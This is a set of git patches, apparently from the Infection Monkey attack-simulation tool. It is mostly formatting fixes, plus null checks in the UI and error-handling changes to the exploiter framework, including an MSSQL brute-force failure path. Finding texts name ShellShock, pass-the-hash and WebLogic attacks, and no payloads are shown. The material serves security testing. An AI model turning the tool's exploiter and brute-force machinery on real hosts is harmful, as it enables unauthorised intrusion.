--git a/monkey/monkey_island/cc/ui/src/images/zerotrust/im-alert-network-icon.svg b/monkey/monkey_island/cc/ui/src/images/zerotrust/im-alert-network-icon.svg index 50dcc6726..0951d7ae2 100644 --- a/monkey/monkey_island/cc/ui/src/images/zerotrust/im-alert-network-icon.svg +++ b/monkey/monkey_island/cc/ui/src/images/zerotrust/im-alert-network-icon.svg @@ -1 +1,23 @@ -im-alert-network-icon \ No newline at end of file + + im-alert-network-icon + + + + + + + + + + + + + + + + + + + + + diff --git a/monkey/monkey_island/cc/ui/src/index.html b/monkey/monkey_island/cc/ui/src/index.html index 3e7028fc1..38b0c114d 100644 --- a/monkey/monkey_island/cc/ui/src/index.html +++ b/monkey/monkey_island/cc/ui/src/index.html @@ -8,6 +8,6 @@ -
    +
    diff --git a/monkey/monkey_island/cc/ui/src/index.js b/monkey/monkey_island/cc/ui/src/index.js index 329e94dfe..b2c79eaf9 100644 --- a/monkey/monkey_island/cc/ui/src/index.js +++ b/monkey/monkey_island/cc/ui/src/index.js @@ -6,4 +6,4 @@ import App from './components/Main'; import Bootstrap from 'bootstrap/dist/css/bootstrap.css'; // eslint-disable-line no-unused-vars // Render the main component into the dom -ReactDOM.render(, document.getElementById('app')); +ReactDOM.render(, document.getElementById('app')); diff --git a/monkey/monkey_island/cc/ui/src/server_config/AwsConfig.js b/monkey/monkey_island/cc/ui/src/server_config/AwsConfig.js index 1c5814b5a..452bfaede 100644 --- a/monkey/monkey_island/cc/ui/src/server_config/AwsConfig.js +++ b/monkey/monkey_island/cc/ui/src/server_config/AwsConfig.js @@ -1,6 +1,6 @@ import BaseConfig from './BaseConfig'; -class AwsConfig extends BaseConfig{ +class AwsConfig extends BaseConfig { isAuthEnabled() { return true; } diff --git a/monkey/monkey_island/cc/ui/src/server_config/PasswordConfig.js b/monkey/monkey_island/cc/ui/src/server_config/PasswordConfig.js index 359b21bfb..167d1ab60 100644 --- a/monkey/monkey_island/cc/ui/src/server_config/PasswordConfig.js +++ b/monkey/monkey_island/cc/ui/src/server_config/PasswordConfig.js @@ -1,6 +1,6 @@ import BaseConfig from './BaseConfig'; -class PasswordConfig extends BaseConfig{ +class PasswordConfig extends BaseConfig { isAuthEnabled() { return true; } diff --git a/monkey/monkey_island/cc/ui/src/server_config/StandardConfig.js b/monkey/monkey_island/cc/ui/src/server_config/StandardConfig.js index f549f7112..c3ace9a97 100644 --- a/monkey/monkey_island/cc/ui/src/server_config/StandardConfig.js +++ b/monkey/monkey_island/cc/ui/src/server_config/StandardConfig.js @@ -2,7 +2,7 @@ import BaseConfig from './BaseConfig'; class StandardConfig extends BaseConfig { - isAuthEnabled () { + isAuthEnabled() { return false; } } diff --git a/monkey/monkey_island/cc/ui/src/services/AuthService.js b/monkey/monkey_island/cc/ui/src/services/AuthService.js index 9c62bde63..3fb70c5bb 100644 --- a/monkey/monkey_island/cc/ui/src/services/AuthService.js +++ b/monkey/monkey_island/cc/ui/src/services/AuthService.js @@ -1,4 +1,4 @@ -import { SHA3 } from 'sha3'; +import {SHA3} from 'sha3'; import decode from 'jwt-decode'; export default class AuthService { @@ -97,8 +97,7 @@ export default class AuthService { _isTokenExpired(token) { try { return decode(token)['exp'] < Date.now() / 1000; - } - catch (err) { + } catch (err) { return false; } } diff --git a/monkey/monkey_island/cc/ui/src/styles/App.css b/monkey/monkey_island/cc/ui/src/styles/App.css index 109f1c147..12a430cf9 100644 --- a/monkey/monkey_island/cc/ui/src/styles/App.css +++ b/monkey/monkey_island/cc/ui/src/styles/App.css @@ -74,14 +74,17 @@ body { background: #e9e9e9; text-decoration: none; } + li a.active { background: #333333; text-decoration: none; color: #ffcc00; } + li a.active:hover { color: #ffcc00; } + li a.disabled { color: #666; cursor: auto; @@ -190,6 +193,7 @@ body { .nav > li > a:focus { background-color: transparent !important; } + /* * Run Monkey Page */ @@ -226,13 +230,16 @@ body { font-size: 20px; } + .preview-pane h3 small { margin-top: 0.5em; display: block; } + .preview-pane h3 .fa { margin-right: 5px; } + .preview-pane h4 { text-transform: uppercase; color: #999; @@ -240,7 +247,7 @@ body { margin-top: 0; } -.preview-pane .table tr:first-child th , .preview-pane .table tr:first-child td { +.preview-pane .table tr:first-child th, .preview-pane .table tr:first-child td { border-top: 0; } @@ -299,7 +306,7 @@ body { left: 0; right: 0; height: 130px; - background: rgba(0,0,0,0.7); + background: rgba(0, 0, 0, 0.7); border-radius: 5px; border: 3px solid #aaa; padding: 0.5em; @@ -329,7 +336,7 @@ body { padding: 0; } -.data-table-container > .container th , .data-table-container > .container td { +.data-table-container > .container th, .data-table-container > .container td { padding: 15px 8px; } @@ -341,7 +348,7 @@ body { margin-left: 1em; } -#search-field , #page-menu { +#search-field, #page-menu { margin-left: 0.5em; margin-bottom: 1em; height: 34px; @@ -477,21 +484,21 @@ body { } .alert-danger { - color:#a94442 !important; - background-color:#f2dede !important; - border-color:#ebccd1 !important; + color: #a94442 !important; + background-color: #f2dede !important; + border-color: #ebccd1 !important; } .alert-success { - color:#3c763d !important; - background-color:#dff0d8 !important; - border-color:#d6e9c6 !important; + color: #3c763d !important; + background-color: #dff0d8 !important; + border-color: #d6e9c6 !important; } .alert-info { - color:#31708f !important; - background-color:#d9edf7 !important; - border-color:#bce8f1 !important; + color: #31708f !important; + background-color: #d9edf7 !important; + border-color: #bce8f1 !important; } .label-default { @@ -529,7 +536,7 @@ body { margin-bottom: 20px; } -.attack-report .btn-collapse span:nth-of-type(2){ +.attack-report .btn-collapse span:nth-of-type(2) { flex: 0; } @@ -580,7 +587,7 @@ body { margin-right: auto; } -.attack-report.footer-text{ +.attack-report.footer-text { text-align: right; font-size: 0.8em; margin-top: 20px; diff --git a/monkey/monkey_island/cc/ui/src/styles/Checkbox.scss b/monkey/monkey_island/cc/ui/src/styles/Checkbox.scss index 3bf0281f6..b18908c5e 100644 --- a/monkey/monkey_island/cc/ui/src/styles/Checkbox.scss +++ b/monkey/monkey_island/cc/ui/src/styles/Checkbox.scss @@ -6,100 +6,105 @@ $green: #44CF6C; $black: #000000; .ui-checkbox-btn { - position: relative; - display: inline-block; - background-color: rgba(red, .6); + position: relative; + display: inline-block; + background-color: rgba(red, .6); text-align: center; width: 100%; height: 100%; - input { display: none; } + input { + display: none; + } - .icon, - .text { - display: inline-block; - color: inherit; - } + .icon, + .text { + display: inline-block; + color: inherit; + } - .text { + .text { padding-top: 4px; - font-size: 14px; - } + font-size: 14px; + } - // color states - &.is-unchecked { - background-color: transparent; - color: $black; - fill: $black; - } + // color states + &.is-unchecked { + background-color: transparent; + color: $black; + fill: $black; + } &.blocked { background-color: $dark-green; - color: $light-grey; - fill: $light-grey; + color: $light-grey; + fill: $light-grey; } - &.is-checked { - background-color: $green; - color: white; - fill: white; - } + &.is-checked { + background-color: $green; + color: white; + fill: white; + } } .icon { - position: relative; - display: inline-block; + position: relative; + display: inline-block; - svg { - position: absolute; - top: 0; right: 0; bottom: 0; left: 0; - margin: auto; - width: 16px; - height: auto; - fill: inherit; - } + svg { + position: absolute; + top: 0; + right: 0; + bottom: 0; + left: 0; + margin: auto; + width: 16px; + height: auto; + fill: inherit; + } - .is-checked & { - color: white; - fill: white; - } + .is-checked & { + color: white; + fill: white; + } } // ping animation magic .ui-btn-ping { - position: absolute; - top: 50%; - left: 50%; - width: 100%; - transform: translate3d(-50%, -50%, 0); // center center by default + position: absolute; + top: 50%; + left: 50%; + width: 100%; + transform: translate3d(-50%, -50%, 0); // center center by default - // set the square - &:before { - content: ''; - transform: scale(0, 0); // center center by default - transition-property: background-color transform; - transition-timing-function: cubic-bezier(0.0, 0.0, 0.2, 1); - display: block; - padding-bottom: 100%; - border-radius: 50%; - background-color: rgba(white, .84);; - } + // set the square + &:before { + content: ''; + transform: scale(0, 0); // center center by default + transition-property: background-color transform; + transition-timing-function: cubic-bezier(0.0, 0.0, 0.2, 1); + display: block; + padding-bottom: 100%; + border-radius: 50%; + background-color: rgba(white, .84);; + } - .do-ping &:before { - transform: scale(2.5, 2.5); - transition-duration: .35s; - background-color: rgba(white, .08); - } + .do-ping &:before { + transform: scale(2.5, 2.5); + transition-duration: .35s; + background-color: rgba(white, .08); + } } -.icon-checked{ - color:$green +.icon-checked { + color: $green } -.icon-mandatory{ - color:$dark-green +.icon-mandatory { + color: $dark-green } -.icon-unchecked{ - color:$black; +.icon-unchecked { + color: $black; } diff --git a/monkey/monkey_island/cc/ui/src/styles/Collapse.scss b/monkey/monkey_island/cc/ui/src/styles/Collapse.scss index e2d7d334a..9277400b8 100644 --- a/monkey/monkey_island/cc/ui/src/styles/Collapse.scss +++ b/monkey/monkey_island/cc/ui/src/styles/Collapse.scss @@ -14,8 +14,8 @@ $default-color: #e0ddde; -webkit-tap-highlight-color: rgba(0, 0, 0, 0); } -.collapse-item button span:first-child{ - text-align:left; +.collapse-item button span:first-child { + text-align: left; } .collapse-item button { @@ -25,7 +25,8 @@ $default-color: #e0ddde; transition: background-color $transition; display: flex; font-family: inherit; - > span { + + > span { display: inline-block; flex: 4; text-align: right; @@ -50,6 +51,7 @@ $default-color: #e0ddde; .collapse-item { padding: 0.5rem; + &--active { .btn-collapse { background-color: #f7f7f7; @@ -61,7 +63,7 @@ $default-color: #e0ddde; padding: 0 7px 7px 7px; border: 2px solid rgb(232, 228, 228); border-top: 0; - display:block !important; + display: block !important; transition: height $transition; overflow: hidden; } @@ -75,12 +77,15 @@ $default-color: #e0ddde; &.collapsing { transform: translateY(-$offset); } + &.collapse-comp { transform: translateY(-$offset); } + &.expanding { transform: translateX(0px); } + &.expanded { transform: translateX(0px); } diff --git a/monkey/monkey_island/cc/utils.py b/monkey/monkey_island/cc/utils.py index 58dff1f5a..01c69e648 100644 --- a/monkey/monkey_island/cc/utils.py +++ b/monkey/monkey_island/cc/utils.py @@ -10,7 +10,6 @@ from ring import lru __author__ = 'Barak' - # Local ips function if sys.platform == "win32": def local_ips(): @@ -19,6 +18,7 @@ if sys.platform == "win32": else: import fcntl + def local_ips(): result = [] try: From e627c8c85742764bfe1e6c481908a0cc2a6142fc Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 21:14:22 +0200 Subject: [PATCH 35/44] Manual fix - auto formatter failed --- monkey/monkey_island/cc/resources/telemetry_feed.py | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/monkey/monkey_island/cc/resources/telemetry_feed.py b/monkey/monkey_island/cc/resources/telemetry_feed.py index 8a8c750b4..6333f2feb 100644 --- a/monkey/monkey_island/cc/resources/telemetry_feed.py +++ b/monkey/monkey_island/cc/resources/telemetry_feed.py @@ -22,9 +22,8 @@ class TelemetryFeed(flask_restful.Resource): if "null" == timestamp or timestamp is None: # special case to avoid ugly JS code... telemetries = mongo.db.telemetry.find({}) else: - telemetries = mongo.db.telemetry.find({'timestamp': {'$gt': dateutil.parser.parse(timestamp)}}) \ - \ - telemetries = telemetries.sort([('timestamp', flask_pymongo.ASCENDING)]) + telemetries = mongo.db.telemetry.find({'timestamp': {'$gt': dateutil.parser.parse(timestamp)}}) + telemetries = telemetries.sort([('timestamp', flask_pymongo.ASCENDING)]) try: return \ From dd461b974b219506083d243d68758ad589a5737c Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 21:20:29 +0200 Subject: [PATCH 36/44] Manual fix - auto formatter is confused again :-1: --- .../cc/services/reporting/aws_exporter.py | 34 +++++++++---------- 1 file changed, 17 insertions(+), 17 deletions(-) diff --git a/monkey/monkey_island/cc/services/reporting/aws_exporter.py b/monkey/monkey_island/cc/services/reporting/aws_exporter.py index 19293f991..1df12e2eb 100644 --- a/monkey/monkey_island/cc/services/reporting/aws_exporter.py +++ b/monkey/monkey_island/cc/services/reporting/aws_exporter.py @@ -208,9 +208,9 @@ class AWSExporter(Exporter): description="Protect {ssh_key} private key with a pass phrase.".format(ssh_key=issue['ssh_key']), recommendation="The machine {machine} ({ip_address}) is vulnerable to a SSH attack. The Monkey authenticated " "over the SSH protocol with private key {ssh_key}.".format( - machine=issue['machine'], - ip_address=issue['ip_address'], - ssh_key=issue['ssh_key']), + machine=issue['machine'], + ip_address=issue['ip_address'], + ssh_key=issue['ssh_key']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -224,8 +224,8 @@ class AWSExporter(Exporter): description="Update your Elastic Search server to version 1.4.3 and up.", recommendation="The machine {0}({1}) is vulnerable to an Elastic Groovy attack. The attack was made " "possible because the Elastic Search server was not patched against CVE-2015-1427.".format( - issue['machine'], - issue['ip_address']), + issue['machine'], + issue['ip_address']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -269,7 +269,7 @@ class AWSExporter(Exporter): recommendation="The machine {0} ({1}) is vulnerable to a ShellShock attack. " "The attack was made possible because the HTTP server running on TCP port {2} was vulnerable to a " "shell injection attack on the paths: {3}.".format( - issue['machine'], issue['ip_address'], issue['port'], issue['paths']), + issue['machine'], issue['ip_address'], issue['port'], issue['paths']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -284,9 +284,9 @@ class AWSExporter(Exporter): "network.".format(issue['username']), recommendation="The machine {0} ({1}) is vulnerable to a SMB attack. The Monkey authenticated over the SMB " "protocol with user {2} and its password.".format( - issue['machine'], - issue['ip_address'], - issue['username']), + issue['machine'], + issue['ip_address'], + issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -301,9 +301,9 @@ class AWSExporter(Exporter): "network.", recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey authenticated over " "the WMI protocol with user {username} and its password.".format( - machine=issue['machine'], - ip_address=issue['ip_address'], - username=issue['username']), + machine=issue['machine'], + ip_address=issue['ip_address'], + username=issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -318,9 +318,9 @@ class AWSExporter(Exporter): "network.".format(issue['username']), recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey used a " "pass-the-hash attack over WMI protocol with user {username}".format( - machine=issue['machine'], - ip_address=issue['ip_address'], - username=issue['username']), + machine=issue['machine'], + ip_address=issue['ip_address'], + username=issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -361,7 +361,7 @@ class AWSExporter(Exporter): description="This critical machine is open to attacks via strong users with access to it.", recommendation="The services: {services} have been found on the machine thus classifying it as a critical " "machine. These users has access to it:{threatening_users}.".format( - services=issue['services'], threatening_users=issue['threatening_users']), + services=issue['services'], threatening_users=issue['threatening_users']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -386,7 +386,7 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=10, title="Oracle WebLogic servers are vulnerable to remote code execution.", - description="Install Oracle critical patch updates. Or update to the latest version. " \ + description="Install Oracle critical patch updates. Or update to the latest version. " "Vulnerable versions are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.", recommendation="Oracle WebLogic server at {machine} ({ip_address}) is vulnerable to remote code execution attack." "The attack was made possible due to incorrect permission assignment in Oracle Fusion Middleware " From 1f598579ee178f651c8a5050837b3453d1f7570a Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 21:22:14 +0200 Subject: [PATCH 37/44] Linter fixes in `common` --- monkey/common/cloud/aws_instance.py | 2 -- monkey/common/cloud/aws_service.py | 1 - monkey/common/cmd/aws/aws_cmd_result.py | 1 - monkey/common/data/__init__.py | 1 + monkey/common/data/network_consts.py | 1 - monkey/common/data/zero_trust_consts.py | 2 +- monkey/common/network/network_range.py | 3 +-- monkey/common/utils/code_utils.py | 2 -- monkey/common/utils/mongo_utils.py | 1 - 9 files changed, 3 insertions(+), 11 deletions(-) diff --git a/monkey/common/cloud/aws_instance.py b/monkey/common/cloud/aws_instance.py index 5178b0938..4339fbcf4 100644 --- a/monkey/common/cloud/aws_instance.py +++ b/monkey/common/cloud/aws_instance.py @@ -4,14 +4,12 @@ import urllib.request import urllib.error import logging - __author__ = 'itay.mizeretz' AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS = "169.254.169.254" AWS_LATEST_METADATA_URI_PREFIX = 'http://{0}/latest/'.format(AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS) ACCOUNT_ID_KEY = "accountId" - logger = logging.getLogger(__name__) diff --git a/monkey/common/cloud/aws_service.py b/monkey/common/cloud/aws_service.py index b435b23c7..6ef385542 100644 --- a/monkey/common/cloud/aws_service.py +++ b/monkey/common/cloud/aws_service.py @@ -14,7 +14,6 @@ COMPUTER_NAME_KEY = 'ComputerName' PLATFORM_TYPE_KEY = 'PlatformType' IP_ADDRESS_KEY = 'IPAddress' - logger = logging.getLogger(__name__) diff --git a/monkey/common/cmd/aws/aws_cmd_result.py b/monkey/common/cmd/aws/aws_cmd_result.py index c8647bfe4..3499f8d14 100644 --- a/monkey/common/cmd/aws/aws_cmd_result.py +++ b/monkey/common/cmd/aws/aws_cmd_result.py @@ -1,6 +1,5 @@ from common.cmd.cmd_result import CmdResult - __author__ = 'itay.mizeretz' diff --git a/monkey/common/data/__init__.py b/monkey/common/data/__init__.py index a379a4743..978540b10 100644 --- a/monkey/common/data/__init__.py +++ b/monkey/common/data/__init__.py @@ -1,2 +1,3 @@ from .zero_trust_consts import populate_mappings + populate_mappings() diff --git a/monkey/common/data/network_consts.py b/monkey/common/data/network_consts.py index 5fc9d6d8a..b194c9421 100644 --- a/monkey/common/data/network_consts.py +++ b/monkey/common/data/network_consts.py @@ -1,2 +1 @@ ES_SERVICE = 'elastic-search-9200' - diff --git a/monkey/common/data/zero_trust_consts.py b/monkey/common/data/zero_trust_consts.py index ae27b1c35..7135485da 100644 --- a/monkey/common/data/zero_trust_consts.py +++ b/monkey/common/data/zero_trust_consts.py @@ -58,7 +58,7 @@ PRINCIPLES = { PRINCIPLE_DATA_TRANSIT: "Secure data at transit by encrypting it.", PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES: "Configure network policies to be as restrictive as possible.", PRINCIPLE_USERS_MAC_POLICIES: "Users' permissions to the network and to resources should be MAC (Mandetory " - "Access Control) only.", + "Access Control) only.", } POSSIBLE_STATUSES_KEY = "possible_statuses" diff --git a/monkey/common/network/network_range.py b/monkey/common/network/network_range.py index 7393ceda2..6a1201e07 100644 --- a/monkey/common/network/network_range.py +++ b/monkey/common/network/network_range.py @@ -59,7 +59,7 @@ class NetworkRange(object, metaclass=ABCMeta): ips = address_str.split('-') try: ipaddress.ip_address(ips[0]) and ipaddress.ip_address(ips[1]) - except ValueError as e: + except ValueError: return False return True return False @@ -173,4 +173,3 @@ class SingleIpRange(NetworkRange): return None, string_ # If a string_ was entered instead of IP we presume that it was domain name and translate it return ip, domain_name - diff --git a/monkey/common/utils/code_utils.py b/monkey/common/utils/code_utils.py index b50e01fb0..214e6d108 100644 --- a/monkey/common/utils/code_utils.py +++ b/monkey/common/utils/code_utils.py @@ -1,5 +1,3 @@ - - # abstract, static method decorator # noinspection PyPep8Naming class abstractstatic(staticmethod): diff --git a/monkey/common/utils/mongo_utils.py b/monkey/common/utils/mongo_utils.py index 48d632bcd..854109b30 100644 --- a/monkey/common/utils/mongo_utils.py +++ b/monkey/common/utils/mongo_utils.py @@ -80,4 +80,3 @@ class MongoUtils: continue return row - From 530e1a3b658748841998d6fcab698cdf4c58c504 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 21:25:37 +0200 Subject: [PATCH 38/44] Whitespace fixes --- monkey/common/cloud/aws_service_test.py | 10 +++++----- monkey/infection_monkey/network/info.py | 5 ----- 2 files changed, 5 insertions(+), 10 deletions(-) diff --git a/monkey/common/cloud/aws_service_test.py b/monkey/common/cloud/aws_service_test.py index ae9c4b5d3..cbcbfebcd 100644 --- a/monkey/common/cloud/aws_service_test.py +++ b/monkey/common/cloud/aws_service_test.py @@ -10,14 +10,14 @@ class TestFilterInstanceDataFromAwsResponse(TestCase): def test_filter_instance_data_from_aws_response(self): json_response_full = """ { - "InstanceInformationList": [ - { + "InstanceInformationList": [ + { "ActivationId": "string", "AgentVersion": "string", - "AssociationOverview": { + "AssociationOverview": { "DetailedStatus": "string", - "InstanceAssociationStatusAggregatedCount": { - "string" : 6 + "InstanceAssociationStatusAggregatedCount": { + "string" : 6 } }, "AssociationStatus": "string", diff --git a/monkey/infection_monkey/network/info.py b/monkey/infection_monkey/network/info.py index 1418c22cc..6b9c5811e 100644 --- a/monkey/infection_monkey/network/info.py +++ b/monkey/infection_monkey/network/info.py @@ -47,24 +47,19 @@ def get_host_subnets(): if is_windows_os(): - def local_ips(): local_hostname = socket.gethostname() return socket.gethostbyname_ex(local_hostname)[2] - def get_routes(): raise NotImplementedError() - else: from fcntl import ioctl - def local_ips(): valid_ips = [network['addr'] for network in get_host_subnets()] return valid_ips - def get_routes(): # based on scapy implementation for route parsing try: f = open("/proc/net/route", "r") From 933dc9c3783671496be837b49c78bca39414272f Mon Sep 17 00:00:00 2001 From: Shivank Date: Wed, 30 Oct 2019 11:06:25 +0530 Subject: [PATCH 39/44] Second File-saver patch --- .../cc/ui/src/components/pages/ConfigurePage.js | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js b/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js index a5aeae3ec..5cbd758cf 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js @@ -1,7 +1,7 @@ import React from 'react'; import Form from 'react-jsonschema-form'; import {Col, Modal, Nav, NavItem} from 'react-bootstrap'; -import FileSaver from "file-saver"; +import FileSaver from 'file-saver'; import AuthComponent from '../AuthComponent'; import { FilePond } from 'react-filepond'; import 'filepond/dist/filepond.min.css'; @@ -309,10 +309,10 @@ class ConfigurePageComponent extends AuthComponent { exportConfig = () => { this.updateConfigSection(); - const JSONString = JSON.stringify(this.state.configuration, null, 2); - const blob = new Blob([JSONString], {type: "text/plain;charset=utf-8"}); + const configAsJson = JSON.stringify(this.state.configuration, null, 2); + const configAsBinary = new Blob([configAsJson], {type: "text/plain;charset=utf-8"}); - FileSaver.saveAs(blob, 'monkey.conf'); + FileSaver.saveAs(configAsBinary, 'monkey.conf'); }; sendConfig() { From 1f5acbc28709d121e0b59181039f3bba6594e5ef Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 31 Oct 2019 10:48:02 +0200 Subject: [PATCH 40/44] Another white screen fix --- .../cc/ui/src/components/pages/MapPage.js | 28 +++++++++++-------- 1 file changed, 16 insertions(+), 12 deletions(-) diff --git a/monkey/monkey_island/cc/ui/src/components/pages/MapPage.js b/monkey/monkey_island/cc/ui/src/components/pages/MapPage.js index 4d074c835..f9d1f4a83 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/MapPage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/MapPage.js @@ -43,11 +43,13 @@ class MapPageComponent extends AuthComponent { this.authFetch('/api/netmap') .then(res => res.json()) .then(res => { - res.edges.forEach(edge => { - edge.color = {'color': edgeGroupToColor(edge.group)}; - }); - this.setState({graph: res}); - this.props.onStatusChange(); + if (res.hasOwnProperty("edges")) { + res.edges.forEach(edge => { + edge.color = {'color': edgeGroupToColor(edge.group)}; + }); + this.setState({graph: res}); + this.props.onStatusChange(); + } }); }; @@ -55,14 +57,16 @@ class MapPageComponent extends AuthComponent { this.authFetch('/api/telemetry-feed?timestamp='+this.state.telemetryLastTimestamp) .then(res => res.json()) .then(res => { - let newTelem = this.state.telemetry.concat(res['telemetries']); + if ('telemetries' in res) { + let newTelem = this.state.telemetry.concat(res['telemetries']); - this.setState( - { - telemetry: newTelem, - telemetryLastTimestamp: res['timestamp'] - }); - this.props.onStatusChange(); + this.setState( + { + telemetry: newTelem, + telemetryLastTimestamp: res['timestamp'] + }); + this.props.onStatusChange(); + } }); }; From e5715f5a7ea3286c52d4d0a252ca09477d6ba7ff Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 31 Oct 2019 12:11:22 +0200 Subject: [PATCH 41/44] Removed unnecessary logging of config in BB and MSSQL unhandled error --- envs/monkey_zoo/blackbox/tests/basic_test.py | 1 - monkey/infection_monkey/exploit/__init__.py | 6 ++++-- monkey/infection_monkey/exploit/mssqlexec.py | 4 ++-- monkey/infection_monkey/monkey.py | 6 +++++- 4 files changed, 11 insertions(+), 6 deletions(-) diff --git a/envs/monkey_zoo/blackbox/tests/basic_test.py b/envs/monkey_zoo/blackbox/tests/basic_test.py index d2fad4e1e..8456dccad 100644 --- a/envs/monkey_zoo/blackbox/tests/basic_test.py +++ b/envs/monkey_zoo/blackbox/tests/basic_test.py @@ -23,7 +23,6 @@ class BasicTest(object): self.log_handler = log_handler def run(self): - LOGGER.info("Uploading configuration:\n{}".format(json.dumps(self.config_parser.config_json, indent=2))) self.island_client.import_config(self.config_parser.config_raw) self.print_test_starting_info() try: diff --git a/monkey/infection_monkey/exploit/__init__.py b/monkey/infection_monkey/exploit/__init__.py index 9e899b140..0431e7295 100644 --- a/monkey/infection_monkey/exploit/__init__.py +++ b/monkey/infection_monkey/exploit/__init__.py @@ -47,8 +47,10 @@ class HostExploiter(object, metaclass=ABCMeta): def exploit_host(self): self.pre_exploit() - result = self._exploit_host() - self.post_exploit() + try: + result = self._exploit_host() + finally: + self.post_exploit() return result def pre_exploit(self): diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index dcad2adf1..dee597a18 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -11,7 +11,7 @@ from infection_monkey.exploit.tools.http_tools import MonkeyHTTPServer from infection_monkey.exploit.tools.helpers import get_monkey_dest_path, build_monkey_commandline, get_monkey_depth from infection_monkey.model import DROPPER_ARG from infection_monkey.exploit.tools.payload_parsing import LimitedSizePayload -from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError +from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError, FailedExploitationError LOG = logging.getLogger(__name__) @@ -185,7 +185,7 @@ class MSSQLExploiter(HostExploiter): LOG.warning('No user/password combo was able to connect to host: {0}:{1}, ' 'aborting brute force'.format(host, port)) - raise RuntimeError("Bruteforce process failed on host: {0}".format(self.host.ip_addr)) + raise FailedExploitationError("Bruteforce process failed on host: {0}".format(self.host.ip_addr)) class MSSQLLimitedSizePayload(LimitedSizePayload): diff --git a/monkey/infection_monkey/monkey.py b/monkey/infection_monkey/monkey.py index 3985c8a2e..3af70c796 100644 --- a/monkey/infection_monkey/monkey.py +++ b/monkey/infection_monkey/monkey.py @@ -26,7 +26,7 @@ from infection_monkey.telemetry.tunnel_telem import TunnelTelem from infection_monkey.windows_upgrader import WindowsUpgrader from infection_monkey.post_breach.post_breach_handler import PostBreach from infection_monkey.exploit.tools.helpers import get_interface_to_target -from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError +from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError, FailedExploitationError from infection_monkey.telemetry.attack.t1106_telem import T1106Telem from common.utils.attack_utils import ScanStatus, UsageEnum @@ -192,7 +192,9 @@ class InfectionMonkey(object): self._exploiters = sorted(self._exploiters, key=lambda exploiter_: exploiter_.EXPLOIT_TYPE.value) host_exploited = False for exploiter in [exploiter(machine) for exploiter in self._exploiters]: + if self.try_exploiting(machine, exploiter): + host_exploited = True VictimHostTelem('T1210', ScanStatus.USED, machine=machine).send() break @@ -311,6 +313,8 @@ class InfectionMonkey(object): machine, exploiter.__class__.__name__, exc) self.successfully_exploited(machine, exploiter) return True + except FailedExploitationError as e: + LOG.info("Failed exploiting %r with exploiter %s, %s", machine, exploiter.__class__.__name__, e) except Exception as exc: LOG.exception("Exception while attacking %s using %s: %s", machine, exploiter.__class__.__name__, exc) From c778ae7aa1ef87769ce41a7c8422e951bd556508 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 4 Nov 2019 11:27:34 +0200 Subject: [PATCH 42/44] Changed import to `import common.data.zero_trust_consts as zero_trust_consts` Looks better --- .../cc/models/zero_trust/aggregate_finding.py | 6 +- .../cc/models/zero_trust/event.py | 4 +- .../cc/models/zero_trust/finding.py | 10 +- .../models/zero_trust/segmentation_finding.py | 6 +- .../zero_trust/test_aggregate_finding.py | 14 +- .../cc/models/zero_trust/test_event.py | 6 +- .../cc/models/zero_trust/test_finding.py | 16 +- .../zero_trust/test_segmentation_finding.py | 12 +- .../reporting/test_zero_trust_service.py | 252 +++++++++--------- .../services/reporting/zero_trust_service.py | 63 +++-- .../zero_trust_tests/antivirus_existence.py | 13 +- .../communicate_as_new_user.py | 11 +- .../zero_trust_tests/data_endpoints.py | 23 +- .../zero_trust_tests/machine_exploited.py | 12 +- .../zero_trust_tests/segmentation.py | 10 +- .../test_segmentation_zt_tests.py | 25 +- .../telemetry/zero_trust_tests/tunneling.py | 8 +- 17 files changed, 253 insertions(+), 238 deletions(-) diff --git a/monkey/monkey_island/cc/models/zero_trust/aggregate_finding.py b/monkey/monkey_island/cc/models/zero_trust/aggregate_finding.py index c3ed52649..38b551047 100644 --- a/monkey/monkey_island/cc/models/zero_trust/aggregate_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/aggregate_finding.py @@ -1,4 +1,4 @@ -from common.data.zero_trust_consts import 